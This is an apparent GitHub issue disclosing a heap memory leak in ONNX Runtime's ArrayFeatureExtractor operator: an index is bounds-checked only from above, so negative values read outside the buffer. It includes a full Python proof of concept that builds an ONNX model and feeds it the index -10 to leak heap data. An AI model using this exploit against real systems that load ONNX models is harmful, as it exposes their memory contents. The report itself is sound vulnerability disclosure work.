-
Notifications
You must be signed in to change notification settings - Fork 3.7k
Description
The vulnerability being exploited is a heap leak caused by an out-of-bounds read in ONNX Runtime’s ArrayFeatureExtractor operator. The root cause is insufficient bounds checking on the index input, allowing negative values to access unintended memory regions.
POC: Files shows code and code output
Per Copilot:
Type: Out-of-bounds read (OOB read) in ONNX Runtime’s ArrayFeatureExtractor operator
Affected Version: ≤ 1.23.2 (latest at time of report)
Root Cause:
In the file onnxruntime/core/providers/cpu/ml/array_feature_extractor.cc, the code checks if y_data[i] <= stride (where stride is the total length), but does not check if y_data[i] >= 0.
This means a negative index can be used, causing an out-of-bounds read and leaking heap memory values.
Example: Supplying a negative value in y_data (e.g., y_data = [-10]) bypasses bounds checking and reads unintended memory, exposing heap data.
FINDERS Notes ------------
Detailed information is in the attachment, which includes complete steps to reproduce the problem.
Detailed information is in the attachment, which includes complete steps to reproduce the problem.
Save the model
import numpy as np
import onnx
from onnx import helper, TensorProto, checker
x_shape = [ 10,1]
x_dtype = TensorProto.INT64
y_shape = [1]
y_dtype = TensorProto.INT64
z_dtype = TensorProto.INT64
z_shape = [ 10,1]
node = helper.make_node(
op_type="ArrayFeatureExtractor",
inputs=["x", "y"],
outputs=["z"],
domain="ai.onnx.ml"
)
input_x = helper.make_tensor_value_info(
"x", x_dtype, x_shape
)
input_y = helper.make_tensor_value_info(
"y", y_dtype, y_shape
)
output_z = helper.make_tensor_value_info(
"z", z_dtype, z_shape
)
graph = helper.make_graph(
nodes=[node],
name="ArrayFeatureExtractor_Test",
inputs=[input_x, input_y],
outputs=[output_z]
)
opset_imports = [
helper.make_opsetid("", 15),
helper.make_opsetid("ai.onnx.ml", 3),
]
model = helper.make_model(
graph,
opset_imports=opset_imports,
producer_name="onnx-example"
)
onnx.save(model, "array_feature_extractor_manual.onnx")
Load the model
import onnxruntime as ort
import numpy as np
session = ort.InferenceSession("array_feature_extractor_manual.onnx", providers=["CPUExecutionProvider"])
x_data = np.arange(10, dtype=np.int64).reshape( 10,1)
y_data = np.array([-10], dtype=np.int64)
print(x_data)
print("?? Index:", y_data)
results = session.run(
["z"],
{"x": x_data, "y": y_data}
)
z_output = results[0]
print(z_output)